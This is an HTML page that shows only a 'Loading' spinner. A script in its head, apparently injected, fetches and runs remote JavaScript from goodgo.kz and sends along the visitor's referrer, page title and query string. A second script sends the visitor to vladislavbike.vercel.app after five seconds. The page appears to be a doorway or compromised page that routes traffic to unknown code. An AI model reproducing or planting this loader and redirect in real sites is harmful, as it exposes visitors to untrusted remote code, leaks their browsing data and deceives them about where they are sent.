<html>
    <head>
        <meta charset = 'utf-8'>
        <link href = "loader.css" rel = "stylesheet"
        type = "text/css">
        <span id="af948df9-34b3-8892-acc5-cafb3cf24c3f"></span><script type="application/javascript">
            var d=document;var s=d.createElement('script'); 
            s.src='https://goodgo.kz/xRn57Z7R?&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm63870967e0e0a=script63870967e0e0b&_cid=af948df9-34b3-8892-acc5-cafb3cf24c3f'; 
            if (document.currentScript) { 
            document.currentScript.parentNode.insertBefore(s, document.currentScript);
            } else {
            d.getElementsByTagName('head')[0].appendChild(s);
            }
            if (document.location.protocol === 'https:' && 'https://goodgo.kz/xRn57Z7R?&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm63870967e0e0a=script63870967e0e0b'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
            </script>
    </head>
    <body>
   <style type="text/css">
.cont {width:100%;height:100%;min-height:100vh;background:#fff;}
.preloader {position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);width:300px;height:300px;}
.preloader__loading {width:300px;height:300px;box-sizing:border-box;border-radius:50%;border-top:10px solid #000000;position:relative;animation:a1 2s linear infinite;}
.preloader__text {position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);width:100%;text-align:center;color:#3d3d3d;font-size:26px;}
.preloader__loading::before,.preloader__loading::after{content:'';width:300px;height:300px;position:absolute;left:0;top:-10px;box-sizing:border-box;border-radius:50%;}
.preloader__loading::before{border-top:10px solid #000000;transform:rotate(120deg);}
.preloader__loading::after{border-top:10px solid #0a0a0a;transform:rotate(240deg);}
@keyframes a1 {to{  transform:rotate(360deg);}}
</style>

<div class="cont">
  <div class="preloader">
    <div class="preloader__loading"></div>
    <div class="preloader__text">Loading</div>
  </div>
</div>
        <script type="text/javascript">        
           function redirector()
           {
            window.location.href='http://vladislavbike.vercel.app';
           }
           setTimeout(redirector, 5000);
           
     </script>

</body>
</html>
